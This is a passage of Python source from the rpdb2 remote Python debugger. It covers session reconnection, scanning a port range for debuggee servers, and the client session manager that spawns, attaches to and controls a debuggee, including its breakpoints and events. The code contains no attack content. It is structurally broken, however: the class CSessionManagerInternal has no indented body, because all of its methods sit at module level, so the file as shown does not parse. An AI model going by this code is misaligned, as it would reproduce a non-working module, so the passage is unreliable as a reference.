        While the reconnect is in flight m_fRestart blocks getProxy()
        callers; on failure the session is marked shut down and
        CConnectionException (or the original error) propagates.
        """
        self.m_fRestart = True
        time.sleep(sleep)
        t0 = time.time()
        try:
            try:
                while time.time() < t0 + timeout:
                    try:
                        self.Connect()
                        return
                    except socket.error:
                        continue
                raise CConnectionException
            except:
                self.m_fShutDown = True
                raise
        finally:
            self.m_fRestart = False
    def shut_down(self):
        """Mark the session dead; getProxy() will raise NotAttached."""
        self.m_fShutDown = True
    def getProxy(self):
        """
        Return the proxy object.
        With this object you can invoke methods on the server.
        """
        # Spin-wait while a restart is in progress so callers never see
        # a half-replaced proxy.
        while self.m_fRestart:
            time.sleep(0.1)
        if self.m_fShutDown:
            raise NotAttached
        return self.m_proxy
    def ConnectAsync(self):
        """Start Connect() on a background thread; return the thread."""
        t = threading.Thread(target = self.ConnectNoThrow)
        #thread_set_daemon(t, True)
        t.start()
        return t
    def ConnectNoThrow(self):
        """Connect(), stashing any exception in m_exc_info instead of raising."""
        try:
            self.Connect()
        except:
            self.m_exc_info = sys.exc_info()
    def Connect(self):
        """Handshake with the server and build the session proxy."""
        host = self.m_host
        if host.lower() == LOCALHOST:
            host = LOOPBACK
        # First a short-timeout probe to fetch server info, then the
        # real session proxy bound to that server's rid.
        server = CPwdServerProxy(self.m_crypto, calcURL(host, self.m_port), CTimeoutTransport())
        server_info = server.server_info()
        self.m_proxy = CPwdServerProxy(self.m_crypto, calcURL(host, self.m_port), CLocalTransport(), target_rid = server_info.m_rid)
        self.m_server_info = server_info
    def isConnected(self):
        """Return True once Connect() has produced a proxy."""
        return self.m_proxy is not None
class CServerList:
    """
    Scans the rpdb2 server port range on a host and keeps the list of
    responding debuggee servers (CServerInfo objects), youngest first.
    """
    def __init__(self, host):
        self.m_host = host
        self.m_list = []    # CServerInfo objects from the last scan
        self.m_errors = {}  # exception-type -> list of sys.exc_info() tuples
    def calcList(self, _rpdb2_pwd, rid, key = None):
        """Scan the port range and rebuild m_list.

        If key is given, return the single matching server (raising
        UnknownServer when absent); otherwise return the full list.
        """
        sil = []
        sessions = []
        self.m_errors = {}
        port = SERVER_PORT_RANGE_START
        while port < SERVER_PORT_RANGE_START + SERVER_PORT_RANGE_LENGTH:
            s = CSession(self.m_host, port, _rpdb2_pwd, fAllowUnencrypted = True, rid = rid)
            t = s.ConnectAsync()
            sessions.append((s, t))
            port += 1
        for (s, t) in sessions:
            t.join()
            if (s.m_exc_info is not None):
                # Plain socket errors just mean "no server here"; anything
                # else is worth reporting to the user.
                if not issubclass(s.m_exc_info[0], socket.error):
                    self.m_errors.setdefault(s.m_exc_info[0], []).append(s.m_exc_info)
                continue
            si = s.getServerInfo()
            if si is not None:
                sil.append((-si.m_age, si))
        # Sort youngest first. Sort on the age key only, so equal ages do
        # not fall back to comparing CServerInfo objects (a TypeError on
        # Python 3). The original code also redundantly re-sorted and
        # rebuilt m_list a second time; that duplication is removed.
        sil.sort(key = lambda entry: entry[0])
        self.m_list = [entry[1] for entry in sil]
        if key is not None:
            # A specific server was requested: return it or fail.
            try:
                return self.findServers(key)[0]
            except Exception:
                raise UnknownServer
        return self.m_list
    def get_errors(self):
        """Return the error map collected by the last calcList() scan."""
        return self.m_errors
    def findServers(self, key):
        """Return servers matching key by pid, rid, or filename substring.

        Raises UnknownServer when nothing matches.
        """
        try:
            n = int(key)
            _s = [s for s in self.m_list if (s.m_pid == n) or (s.m_rid == key)]
        except ValueError:
            # Not a number: match key as a filename fragment.
            key = as_string(key, sys.getfilesystemencoding())
            _s = [s for s in self.m_list if key in s.m_filename]
        if _s == []:
            raise UnknownServer
        return _s
class CSessionManagerInternal:
def __init__(self, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, host):
    """Build the client-side session manager.

    Wires up event dispatchers, state manager, breakpoint proxy and the
    event callbacks, and initializes session policy defaults.
    """
    # Treat '' like "no password set".
    self.m_rpdb2_pwd = [_rpdb2_pwd, None][_rpdb2_pwd in [None, '']]
    self.m_fAllowUnencrypted = fAllowUnencrypted
    self.m_fAllowRemote = fAllowRemote
    self.m_rid = generate_rid()
    self.m_host = host
    self.m_server_list_object = CServerList(host)
    self.m_session = None
    self.m_server_info = None
    # Event monitor thread bookkeeping.
    self.m_worker_thread = None
    self.m_worker_thread_ident = None
    self.m_fStop = False
    # Cached stack/frame state (reset on state changes).
    self.m_stack_depth = None
    self.m_stack_depth_exception = None
    self.m_frame_index = 0
    self.m_frame_index_exception = 0
    self.m_completions = {}
    self.m_remote_event_index = 0
    # Proxy dispatcher receives remote events; the main dispatcher
    # chains off it for local consumers.
    self.m_event_dispatcher_proxy = CEventDispatcher()
    self.m_event_dispatcher = CEventDispatcher(self.m_event_dispatcher_proxy)
    self.m_state_manager = CStateManager(STATE_DETACHED, self.m_event_dispatcher, self.m_event_dispatcher_proxy)
    self.m_breakpoints_proxy = CBreakPointsManagerProxy(self)
    # Register event callbacks.
    event_type_dict = {CEventState: {EVENT_EXCLUDE: [STATE_BROKEN, STATE_ANALYZE]}}
    self.register_callback(self.reset_frame_indexes, event_type_dict, fSingleUse = False)
    event_type_dict = {CEventStackDepth: {}}
    self.register_callback(self.set_stack_depth, event_type_dict, fSingleUse = False)
    event_type_dict = {CEventNoThreads: {}}
    self.register_callback(self._reset_frame_indexes, event_type_dict, fSingleUse = False)
    event_type_dict = {CEventExit: {}}
    self.register_callback(self.on_event_exit, event_type_dict, fSingleUse = False)
    event_type_dict = {CEventConflictingModules: {}}
    self.register_callback(self.on_event_conflicting_modules, event_type_dict, fSingleUse = False)
    event_type_dict = {CEventSignalIntercepted: {}}
    self.register_callback(self.on_event_signal_intercept, event_type_dict, fSingleUse = False)
    event_type_dict = {CEventSignalException: {}}
    self.register_callback(self.on_event_signal_exception, event_type_dict, fSingleUse = False)
    event_type_dict = {CEventEmbeddedSync: {}}
    self.register_callback(self.on_event_embedded_sync, event_type_dict, fSingleUse = False)
    # Policy events are handled on the proxy dispatcher and overridden
    # in the chained dispatcher so local state stays authoritative.
    event_type_dict = {CEventSynchronicity: {}}
    self.m_event_dispatcher_proxy.register_callback(self.on_event_synchronicity, event_type_dict, fSingleUse = False)
    self.m_event_dispatcher.register_chain_override(event_type_dict)
    event_type_dict = {CEventTrap: {}}
    self.m_event_dispatcher_proxy.register_callback(self.on_event_trap, event_type_dict, fSingleUse = False)
    self.m_event_dispatcher.register_chain_override(event_type_dict)
    event_type_dict = {CEventForkMode: {}}
    self.m_event_dispatcher_proxy.register_callback(self.on_event_fork_mode, event_type_dict, fSingleUse = False)
    self.m_event_dispatcher.register_chain_override(event_type_dict)
    # Session policy defaults.
    self.m_printer = self.__nul_printer
    self.m_last_command_line = None
    self.m_last_fchdir = None
    self.m_fsynchronicity = True
    self.m_ftrap = True
    self.m_ffork_into_child = False
    self.m_ffork_auto = False
    self.m_environment = []
    self.m_encoding = ENCODING_AUTO
    self.m_fraw = False
def shutdown(self):
    """Shut down both event dispatchers and the state manager."""
    for component in (self.m_event_dispatcher_proxy,
                      self.m_event_dispatcher,
                      self.m_state_manager):
        component.shutdown()
def __nul_printer(self, _str):
    """Default message sink: silently discard the text."""
    pass
def set_printer(self, printer):
    """Install the callable used to show messages to the user."""
    self.m_printer = printer
def register_callback(self, callback, event_type_dict, fSingleUse):
    """Register an event callback on the main dispatcher."""
    dispatcher = self.m_event_dispatcher
    return dispatcher.register_callback(callback, event_type_dict, fSingleUse)
def remove_callback(self, callback):
    """Remove a previously registered event callback."""
    dispatcher = self.m_event_dispatcher
    return dispatcher.remove_callback(callback)
def __wait_for_debuggee(self, rid):
    """
    Poll the server port range until the freshly spawned debuggee
    (identified by rid) shows up; server-scan errors are reported in
    the finally clause either way.
    """
    try:
        # Give the child process a head start before the first scan.
        time.sleep(STARTUP_TIMEOUT / 2)
        for i in range(STARTUP_RETRIES):
            try:
                print_debug('Scanning for debuggee...')
                t0 = time.time()
                return self.m_server_list_object.calcList(self.m_rpdb2_pwd, self.m_rid, rid)
            except UnknownServer:
                dt = time.time() - t0
                if dt < STARTUP_TIMEOUT:
                    # Pace retries to one scan per STARTUP_TIMEOUT window.
                    time.sleep(STARTUP_TIMEOUT - dt)
                continue
        # Final attempt; this time let UnknownServer propagate.
        return self.m_server_list_object.calcList(self.m_rpdb2_pwd, self.m_rid, rid)
    finally:
        errors = self.m_server_list_object.get_errors()
        self.__report_server_errors(errors, fsupress_pwd_warning = True)
def get_encryption(self):
    """Return whether the attached session's channel is encrypted."""
    session = self.getSession()
    return session.get_encryption()
def launch(self, fchdir, command_line, fload_breakpoints = True):
    """
    Spawn command_line under a new debuggee server and attach to it.

    fchdir - change to the script's directory before running it.
    Raises SpawnUnsupported / FirewallBlock / BadArgument as applicable.
    """
    assert(is_unicode(command_line))
    self.__verify_unattached()
    if not os.name in [POSIX, 'nt']:
        self.m_printer(STR_SPAWN_UNSUPPORTED)
        raise SpawnUnsupported
    if g_fFirewallTest:
        firewall_test = CFirewallTest(self.get_remote())
        if not firewall_test.run():
            raise FirewallBlock
    else:
        print_debug('Skipping firewall test.')
    if self.m_rpdb2_pwd is None:
        # No password configured: generate a random one for the session.
        self.set_random_password()
    if command_line == '':
        raise BadArgument
    (path, filename, args) = split_command_line_path_filename_args(command_line)
    #if not IsPythonSourceFile(filename):
    #    raise NotPythonSource
    _filename = my_os_path_join(path, filename)
    ExpandedFilename = FindFile(_filename)
    self.set_host(LOCALHOST)
    self.m_printer(STR_STARTUP_SPAWN_NOTICE)
    rid = generate_rid()
    # The password file lets the spawned server authenticate this client.
    create_pwd_file(rid, self.m_rpdb2_pwd)
    self.m_state_manager.set_state(STATE_SPAWNING)
    try:
        try:
            self._spawn_server(fchdir, ExpandedFilename, args, rid)
            server = self.__wait_for_debuggee(rid)
            self.attach(server.m_rid, server.m_filename, fsupress_pwd_warning = True, fsetenv = True, ffirewall_test = False, server = server, fload_breakpoints = fload_breakpoints)
            # Remember the launch parameters for restart().
            self.m_last_command_line = command_line
            self.m_last_fchdir = fchdir
        except:
            if self.m_state_manager.get_state() != STATE_DETACHED:
                self.m_state_manager.set_state(STATE_DETACHED)
            raise
    finally:
        delete_pwd_file(rid)
def restart(self):
    """
    Restart the debug session using the command line and chdir flag
    remembered from the previous launch(); a no-op when nothing has
    been launched yet.
    """
    if self.m_last_fchdir is None or self.m_last_command_line is None:
        return
    if self.m_state_manager.get_state() != STATE_DETACHED:
        self.stop_debuggee()
    self.launch(self.m_last_fchdir, self.m_last_command_line)
def get_launch_args(self):
    """
    Return (last_fchdir, last_command_line) from the previous launch,
    or (None, None) when there was no previous launch.
    """
    fchdir = self.m_last_fchdir
    cmdline = self.m_last_command_line
    if fchdir is None or cmdline is None:
        return (None, None)
    return (fchdir, cmdline)
def _spawn_server(self, fchdir, ExpandedFilename, args, rid):
    """
    Start an OS console to act as server.
    What it does is to start rpdb again in a new console in server only mode.
    """
    # Pick the terminal/console flavor for this platform.
    if g_fScreen:
        name = SCREEN
    elif sys.platform == DARWIN:
        name = DARWIN
    else:
        try:
            import terminalcommand
            name = MAC
        except:
            name = os.name
    if name == 'nt' and g_fDebug:
        name = NT_DEBUG
    # Build the option string for the spawned server process.
    e = ['', ' --encrypt'][not self.m_fAllowUnencrypted]
    r = ['', ' --remote'][self.m_fAllowRemote]
    c = ['', ' --chdir'][fchdir]
    p = ['', ' --pwd="%s"' % self.m_rpdb2_pwd][os.name == 'nt']
    b = ''
    encoding = detect_locale()
    fse = sys.getfilesystemencoding()
    ExpandedFilename = g_found_unicode_files.get(ExpandedFilename, ExpandedFilename)
    ExpandedFilename = as_unicode(ExpandedFilename, fse)
    if as_bytes('?') in as_bytes(ExpandedFilename, encoding, fstrict = False):
        # Path is not representable in the locale encoding: smuggle it
        # through the command line as url-safe base64.
        _u = as_bytes(ExpandedFilename)
        # NOTE(review): base64.encodestring was removed in Python 3.9;
        # base64.encodebytes is the modern spelling.
        _b = base64.encodestring(_u)
        _b = _b.strip(as_bytes('\n')).translate(g_safe_base64_to)
        _b = as_string(_b, fstrict = True)
        b = ' --base64=%s' % _b
    debugger = os.path.abspath(__file__)
    if debugger[-1:] == 'c':
        # Running from a .pyc: point the child at the .py source.
        debugger = debugger[:-1]
    debugger = as_unicode(debugger, fse)
    debug_prints = ['', ' --debug'][g_fDebug]
    options = '"%s"%s --debugee%s%s%s%s%s --rid=%s "%s" %s' % (debugger, debug_prints, p, e, r, c, b, rid, ExpandedFilename, args)
    python_exec = sys.executable
    if python_exec.endswith('w.exe'):
        # Use the console interpreter, not the windowed one.
        python_exec = python_exec[:-5] + '.exe'
    python_exec = as_unicode(python_exec, fse)
    if as_bytes('?') in as_bytes(python_exec + debugger, encoding, fstrict = False):
        raise BadMBCSPath
    if name == POSIX:
        shell = CalcUserShell()
        terminal_command = CalcTerminalCommand()
        if terminal_command in osSpawn:
            command = osSpawn[terminal_command] % {'shell': shell, 'exec': python_exec, 'options': options}
        else:
            command = osSpawn[name] % {'term': terminal_command, 'shell': shell, 'exec': python_exec, 'options': options}
    else:
        command = osSpawn[name] % {'exec': python_exec, 'options': options}
    if name == DARWIN:
        s = 'cd "%s" ; %s' % (getcwdu(), command)
        command = CalcMacTerminalCommand(s)
    print_debug('Terminal open string: %s' % repr(command))
    command = as_string(command, encoding)
    if name == MAC:
        terminalcommand.run(command)
    else:
        # NOTE(review): shell=True with an interpolated command string;
        # the inputs are local paths/options, not untrusted data.
        subprocess.Popen(command, shell=True)
def attach(self, key, name = None, fsupress_pwd_warning = False, fsetenv = False, ffirewall_test = True, server = None, fload_breakpoints = True):
    """
    Attach to a debuggee identified by key (rid, pid, or a filename
    fragment); scans for servers when no server object is supplied.
    """
    assert(is_unicode(key))
    self.__verify_unattached()
    if key == '':
        raise BadArgument
    if self.m_rpdb2_pwd is None:
        #self.m_printer(STR_PASSWORD_MUST_BE_SET)
        raise UnsetPassword
    if g_fFirewallTest and ffirewall_test:
        firewall_test = CFirewallTest(self.get_remote())
        if not firewall_test.run():
            raise FirewallBlock
    elif not g_fFirewallTest and ffirewall_test:
        print_debug('Skipping firewall test.')
    if name is None:
        name = key
    _name = name
    self.m_printer(STR_STARTUP_NOTICE)
    self.m_state_manager.set_state(STATE_ATTACHING)
    try:
        servers = [server]
        if server == None:
            # No pre-located server: scan and resolve key to one.
            self.m_server_list_object.calcList(self.m_rpdb2_pwd, self.m_rid)
            servers = self.m_server_list_object.findServers(key)
            server = servers[0]
        _name = server.m_filename
        errors = self.m_server_list_object.get_errors()
        # Only surface scan errors when the key was ambiguous (not an
        # exact rid/pid match).
        if not key in [server.m_rid, str(server.m_pid)]:
            self.__report_server_errors(errors, fsupress_pwd_warning)
        self.__attach(server, fsetenv)
        if len(servers) > 1:
            self.m_printer(STR_MULTIPLE_DEBUGGEES % key)
        self.m_printer(STR_ATTACH_CRYPTO_MODE % ([' ' + STR_ATTACH_CRYPTO_MODE_NOT, ''][self.get_encryption()]))
        self.m_printer(STR_ATTACH_SUCCEEDED % server.m_filename)
        try:
            if fload_breakpoints:
                self.load_breakpoints()
        except:
            pass
    except (socket.error, CConnectionException):
        self.m_printer(STR_ATTACH_FAILED_NAME % _name)
        self.m_state_manager.set_state(STATE_DETACHED)
        raise
    except:
        # Unexpected failure: dump the traceback and abort hard.
        # NOTE(review): assert is stripped under python -O; confirm this
        # abort-on-unexpected-error behavior is intended.
        print_debug_exception()
        assert False
def report_exception(self, _type, value, tb):
    """Print a user-facing message for an exception, with extra hints
    for POSIX terminals; unknown types also get a full traceback."""
    msg = g_error_mapping.get(_type, STR_ERROR_OTHER)
    posix_no_screen = (os.name == POSIX and not g_fScreen and g_fDefaultStd)
    if _type == SpawnUnsupported and posix_no_screen:
        msg += ' ' + STR_SPAWN_UNSUPPORTED_SCREEN_SUFFIX
    if _type == UnknownServer and posix_no_screen:
        msg += ' ' + STR_DISPLAY_ERROR
    self.m_printer(msg % {'type': _type, 'value': value, 'traceback': tb})
    if _type not in g_error_mapping:
        print_exception(_type, value, tb, True)
def __report_server_errors(self, errors, fsupress_pwd_warning = False):
    """Report the per-exception-type errors collected during a scan."""
    for err_type, err_list in errors.items():
        if fsupress_pwd_warning and err_type in [BadVersion, AuthenticationBadData, AuthenticationFailure]:
            continue
        if err_type in [BadVersion]:
            # Version mismatches: report each occurrence, sans traceback.
            for (t, v, tb) in err_list:
                self.report_exception(t, v, None)
            continue
        # Other types: one representative report with its traceback.
        (t, v, tb) = err_list[0]
        self.report_exception(t, v, tb)
def __attach(self, server, fsetenv):
    """Open a session to server, verify its identity, push local policy
    settings to it, and start the event monitor."""
    self.__verify_unattached()
    session = CSession(self.m_host, server.m_port, self.m_rpdb2_pwd, self.m_fAllowUnencrypted, self.m_rid)
    session.Connect()
    if (session.getServerInfo().m_pid != server.m_pid) or (session.getServerInfo().m_filename != server.m_filename):
        # The server at that port changed identity since the scan.
        raise UnexpectedData
    self.m_session = session
    self.m_server_info = self.get_server_info()
    # Push locally configured policies to the freshly attached server.
    self.getSession().getProxy().set_synchronicity(self.m_fsynchronicity)
    self.getSession().getProxy().set_trap_unhandled_exceptions(self.m_ftrap)
    self.getSession().getProxy().set_fork_mode(self.m_ffork_into_child, self.m_ffork_auto)
    if fsetenv and len(self.m_environment) != 0:
        self.getSession().getProxy().set_environ(self.m_environment)
    self.request_break()
    self.refresh(True)
    self.__start_event_monitor()
    print_debug('Attached to debuggee on port %d.' % session.m_port)
    #self.enable_breakpoint([], fAll = True)
def __verify_unattached(self):
    """Raise AlreadyAttached when a session is currently attached."""
    if self.__is_attached():
        raise AlreadyAttached
def __verify_attached(self):
    """Raise NotAttached when no session is currently attached."""
    if not self.__is_attached():
        raise NotAttached
def __is_attached(self):
    """Return True when a live session exists and we are not detached."""
    detached = self.m_state_manager.get_state() == STATE_DETACHED
    return (not detached) and (self.m_session is not None)
def __verify_broken(self):
    """Raise DebuggerNotBroken unless the debuggee is broken/analyzing."""
    if self.m_state_manager.get_state() not in [STATE_BROKEN, STATE_ANALYZE]:
        raise DebuggerNotBroken
def refresh(self, fSendUnhandled = False):
    """Re-sync the event index and breakpoint state with the debuggee."""
    in_analyze_mode = (self.m_state_manager.get_state() == STATE_ANALYZE)
    proxy = self.getSession().getProxy()
    self.m_remote_event_index = proxy.sync_with_events(in_analyze_mode, fSendUnhandled)
    self.m_breakpoints_proxy.sync()
def __start_event_monitor(self):
    """Spawn the background thread that pulls events from the debuggee."""
    self.m_fStop = False
    worker = threading.Thread(target = self.__event_monitor_proc)
    self.m_worker_thread = worker
    worker.start()
def __event_monitor_proc(self):
    """
    Worker-thread loop: long-poll the debuggee for event batches and
    dispatch them locally; handles fork/exec switches, debuggee exit,
    and transient communication failures.
    """
    self.m_worker_thread_ident = thread.get_ident()
    t = 0
    nfailures = 0
    while not self.m_fStop:
        try:
            # Throttle the loop to at most IDLE_MAX_RATE iterations/sec.
            t = ControlRate(t, IDLE_MAX_RATE)
            if self.m_fStop:
                return
            (n, sel) = self.getSession().getProxy().wait_for_event(PING_TIMEOUT, self.m_remote_event_index)
            # Fork/exec switches: pause the session and reconnect on a
            # separate thread while this loop keeps running.
            if True in [isinstance(e, CEventForkSwitch) for e in sel]:
                print_debug('Received fork switch event.')
                self.getSession().pause()
                threading.Thread(target = self.restart_session_job).start()
            if True in [isinstance(e, CEventExecSwitch) for e in sel]:
                print_debug('Received exec switch event.')
                self.getSession().pause()
                threading.Thread(target = self.restart_session_job, args = (True, )).start()
            if True in [isinstance(e, CEventExit) for e in sel]:
                self.getSession().shut_down()
                self.m_fStop = True
            if n > self.m_remote_event_index:
                self.m_remote_event_index = n
                self.m_event_dispatcher_proxy.fire_events(sel)
            nfailures = 0
        except CConnectionException:
            if not self.m_fStop:
                self.report_exception(*sys.exc_info())
                threading.Thread(target = self.detach_job).start()
            return
        except socket.error:
            # Tolerate up to COMMUNICATION_RETRIES transient failures
            # before giving up and detaching.
            if nfailures < COMMUNICATION_RETRIES:
                nfailures += 1
                continue
            if not self.m_fStop:
                self.report_exception(*sys.exc_info())
                threading.Thread(target = self.detach_job).start()
            return
def on_event_conflicting_modules(self, event):
    """Warn the user about modules that conflict with the debugger."""
    module_names = ', '.join(event.m_modules_list)
    self.m_printer(STR_CONFLICTING_MODULES % module_names)
def on_event_signal_intercept(self, event):
    """Report an intercepted signal, but only while broken/analyzing."""
    if self.m_state_manager.get_state() in [STATE_ANALYZE, STATE_BROKEN]:
        self.m_printer(STR_SIGNAL_INTERCEPT % (event.m_signame, event.m_signum))
def on_event_signal_exception(self, event):
    """Report an exception raised by an intercepted signal handler."""
    details = (event.m_description, event.m_signame, event.m_signum)
    self.m_printer(STR_SIGNAL_EXCEPTION % details)
def on_event_embedded_sync(self, event):
    """Answer an embedded-sync request from the debuggee."""
    #
    # time.sleep() allows pending break requests to go through...
    #
    time.sleep(0.001)
    self.getSession().getProxy().embedded_sync()
def on_event_exit(self, event):
    """Announce debuggee termination and detach on a worker thread."""
    self.m_printer(STR_DEBUGGEE_TERMINATED)
    threading.Thread(target = self.detach_job).start()
def restart_session_job(self, fSendExitOnFailure = False):
    """Try to re-establish the session after a fork/exec switch; on
    failure either fire a synthetic exit event or detach."""
    try:
        self.getSession().restart(sleep = 3)
        return
    except:
        pass
    # Reconnect failed: stop the event monitor loop.
    self.m_fStop = True
    if fSendExitOnFailure:
        self.m_event_dispatcher_proxy.fire_event(CEventExit())
        return
    self.m_printer(STR_LOST_CONNECTION)
    self.detach_job()
def detach_job(self):
    """Detach, swallowing any error (safe to call from worker threads)."""
    try:
        self.detach()
    except:
        pass
def detach(self):
    """
    Detach from the debuggee: save breakpoints (best effort), stop the
    event monitor, let the debuggee run free, and reset local state.
    """
    self.__verify_attached()
    try:
        self.save_breakpoints()
    except:
        print_debug_exception()
        pass
    self.m_printer(STR_ATTEMPTING_TO_DETACH)
    self.m_state_manager.set_state(STATE_DETACHING)
    self.__stop_event_monitor()
    try:
        #self.disable_breakpoint([], fAll = True)
        try:
            # Stop trapping so the debuggee won't re-break after we go.
            self.getSession().getProxy().set_trap_unhandled_exceptions(False)
            self.request_go(fdetach = True)
        except DebuggerNotBroken:
            pass
    finally:
        self.m_state_manager.set_state(STATE_DETACHED)
        self.m_session = None
    self.m_printer(STR_DETACH_SUCCEEDED)
def __stop_event_monitor(self):
    """Stop the event monitor thread and wait for it to exit."""
    self.m_fStop = True
    if self.m_worker_thread is not None:
        # Only join when called from a different thread than the monitor
        # itself (joining your own thread would deadlock).
        if thread.get_ident() != self.m_worker_thread_ident:
            try:
                # Poke the server with a no-op so the monitor thread's
                # blocking wait_for_event() returns promptly.
                self.getSession().getProxy().null()
            except:
                pass
            self.m_worker_thread.join()
        self.m_worker_thread = None
        self.m_worker_thread_ident = None
def request_break(self):
    """Ask the debuggee to break into the debugger."""
    proxy = self.getSession().getProxy()
    proxy.request_break()
def request_go(self, fdetach = False):
    """Resume the debuggee; fdetach signals an impending detach."""
    proxy = self.getSession().getProxy()
    proxy.request_go(fdetach)
def request_go_breakpoint(self, filename, scope, lineno):
    """Run until the given temporary location is reached."""
    in_analyze_mode = (self.m_state_manager.get_state() == STATE_ANALYZE)
    frame = self.get_frame_index()
    proxy = self.getSession().getProxy()
    proxy.request_go_breakpoint(filename, scope, lineno, frame, in_analyze_mode)
def request_step(self):
    """Single-step (step into) the debuggee."""
    proxy = self.getSession().getProxy()
    proxy.request_step()
def request_next(self):
    """Step over the current statement in the debuggee."""
    proxy = self.getSession().getProxy()
    proxy.request_next()
def request_return(self):
    """Run the debuggee until the current frame returns."""
    proxy = self.getSession().getProxy()
    proxy.request_return()
def request_jump(self, lineno):
    """Jump to lineno in the debuggee's current frame."""
    proxy = self.getSession().getProxy()
    proxy.request_jump(lineno)
def set_breakpoint(self, filename, scope, lineno, fEnabled, expr, encoding = None):
    """Set a breakpoint in the debuggee; defaults to the session encoding."""
    if encoding is None:
        encoding = self.m_encoding
    in_analyze_mode = (self.m_state_manager.get_state() == STATE_ANALYZE)
    frame = self.get_frame_index()
    proxy = self.getSession().getProxy()
    proxy.set_breakpoint(filename, scope, lineno, fEnabled, expr, frame, in_analyze_mode, encoding)
def disable_breakpoint(self, id_list, fAll):
    """Disable the listed breakpoints (or all of them)."""
    proxy = self.getSession().getProxy()
    proxy.disable_breakpoint(id_list, fAll)
def enable_breakpoint(self, id_list, fAll):
    """Enable the listed breakpoints (or all of them)."""
    proxy = self.getSession().getProxy()
    proxy.enable_breakpoint(id_list, fAll)
def delete_breakpoint(self, id_list, fAll):
    """Delete the listed breakpoints (or all of them)."""
    proxy = self.getSession().getProxy()
    proxy.delete_breakpoint(id_list, fAll)
def get_breakpoints(self):
    """Return the current breakpoint list (requires attachment)."""
    self.__verify_attached()
    return self.m_breakpoints_proxy.get_breakpoints()
def save_breakpoints(self, filename = ''):
    """
    Pickle the current breakpoint list into the per-module breakpoints
    file (optionally suffixed with filename); a no-op for synthetic
    module names like '<stdin>'. Raises CException on failure.
    """
    self.__verify_attached()
    module_name = self.getSession().getServerInfo().m_module_name
    if module_name[:1] == '<':
        return
    if sys.platform == 'OpenVMS':
        # OpenVMS filesystem does not support byte stream.
        mode = 'w'
    else:
        mode = 'wb'
    path = calc_bpl_filename(module_name + filename)
    # 'with' guarantees the handle is closed and avoids shadowing the
    # 'file' builtin as the original code did.
    with open(path, mode) as f:
        try:
            bpl = self.get_breakpoints()
            f.write(pickle.dumps(bpl))
        except:
            print_debug_exception()
            raise CException
def load_breakpoints(self, filename = ''):
    """
    Load breakpoints from the per-module breakpoints file (optionally
    suffixed with filename), replacing all current breakpoints.

    Raises CException when the file cannot be unpickled or any
    breakpoint fails to apply, and IOError when the default file is
    empty. A no-op for synthetic module names like '<stdin>'.
    """
    self.__verify_attached()
    module_name = self.getSession().getServerInfo().m_module_name
    if module_name[:1] == '<':
        return
    if sys.platform == 'OpenVMS':
        # OpenVMS filesystem does not support byte stream.
        mode = 'r'
    else:
        mode = 'rb'
    path = calc_bpl_filename(module_name + filename)
    ferror = False
    # 'with' guarantees the handle is closed and avoids shadowing the
    # 'file' builtin as the original code did.
    with open(path, mode) as f:
        try:
            # NOTE: pickle.load() of a local, user-owned breakpoints
            # file; do not point this at untrusted data.
            bpl = pickle.load(f)
            self.delete_breakpoint([], True)
        except:
            print_debug_exception()
            raise CException
        #
        # No Breakpoints were found in file.
        #
        if filename == '' and len(bpl.values()) == 0:
            raise IOError
        for bp in bpl.values():
            try:
                if bp.m_scope_fqn != None:
                    bp.m_scope_fqn = as_unicode(bp.m_scope_fqn)
                if bp.m_filename != None:
                    bp.m_filename = as_unicode(bp.m_filename)
                if bp.m_expr != None:
                    bp.m_expr = as_unicode(bp.m_expr)
                if bp.m_expr in [None, '']:
                    bp.m_encoding = as_unicode('utf-8')
                self.set_breakpoint(bp.m_filename, bp.m_scope_fqn, bp.m_scope_offset, bp.m_fEnabled, bp.m_expr, bp.m_encoding)
            except:
                # Keep applying the rest; report the failure at the end.
                print_debug_exception()
                ferror = True
        if ferror:
            raise CException
def on_event_synchronicity(self, event):
    """Mirror a remote synchronicity change and re-fire it locally."""
    changed = (self.m_fsynchronicity != event.m_fsynchronicity)
    self.m_fsynchronicity = event.m_fsynchronicity
    if changed:
        self.m_event_dispatcher.fire_event(CEventSynchronicity(event.m_fsynchronicity))
def set_synchronicity(self, fsynchronicity):
    """Set the synchronicity policy, push it to the debuggee if
    attached, and broadcast the change as a local event."""
    self.m_fsynchronicity = fsynchronicity
    if self.__is_attached():
        try:
            self.getSession().getProxy().set_synchronicity(fsynchronicity)
        except NotAttached:
            pass
    self.m_event_dispatcher.fire_event(CEventSynchronicity(fsynchronicity))
def get_synchronicity(self):
    """Return the current synchronicity policy flag."""
    return self.m_fsynchronicity
def on_event_trap(self, event):
    """Mirror a remote trap-policy change and re-fire it locally."""
    changed = (self.m_ftrap != event.m_ftrap)
    self.m_ftrap = event.m_ftrap
    if changed:
        self.m_event_dispatcher.fire_event(CEventTrap(event.m_ftrap))
def set_trap_unhandled_exceptions(self, ftrap):
    """Set the unhandled-exception trap policy, push it to the debuggee
    if attached, and broadcast the change as a local event."""
    self.m_ftrap = ftrap
    if self.__is_attached():
        try:
            self.getSession().getProxy().set_trap_unhandled_exceptions(self.m_ftrap)
        except NotAttached:
            pass
    self.m_event_dispatcher.fire_event(CEventTrap(ftrap))
def get_trap_unhandled_exceptions(self):
    """Return the unhandled-exception trap policy flag."""
    return self.m_ftrap
def is_unhandled_exception(self):
    """Return whether the debuggee is broken on an unhandled exception."""
    self.__verify_attached()
    proxy = self.getSession().getProxy()
    return proxy.is_unhandled_exception()
def on_event_fork_mode(self, event):
    """Mirror a remote fork-mode change and re-fire it locally."""
    old_mode = (self.m_ffork_into_child, self.m_ffork_auto)
    new_mode = (event.m_ffork_into_child, event.m_ffork_auto)
    self.m_ffork_into_child = event.m_ffork_into_child
    self.m_ffork_auto = event.m_ffork_auto
    if old_mode != new_mode:
        self.m_event_dispatcher.fire_event(CEventForkMode(self.m_ffork_into_child, self.m_ffork_auto))
def set_fork_mode(self, ffork_into_child, ffork_auto):
    """Set the fork-handling policy, push it to the debuggee if
    attached, and broadcast the change as a local event."""
    self.m_ffork_into_child = ffork_into_child
    self.m_ffork_auto = ffork_auto
    if self.__is_attached():
        try:
            self.getSession().getProxy().set_fork_mode(ffork_into_child, ffork_auto)
        except NotAttached:
            pass
    self.m_event_dispatcher.fire_event(CEventForkMode(ffork_into_child, ffork_auto))
def get_fork_mode(self):
    """Return the fork policy as (ffork_into_child, ffork_auto)."""
    return (self.m_ffork_into_child, self.m_ffork_auto)
def get_stack(self, tid_list, fAll):
    """Fetch stack traces for the given threads from the debuggee."""
    in_analyze_mode = (self.m_state_manager.get_state() == STATE_ANALYZE)
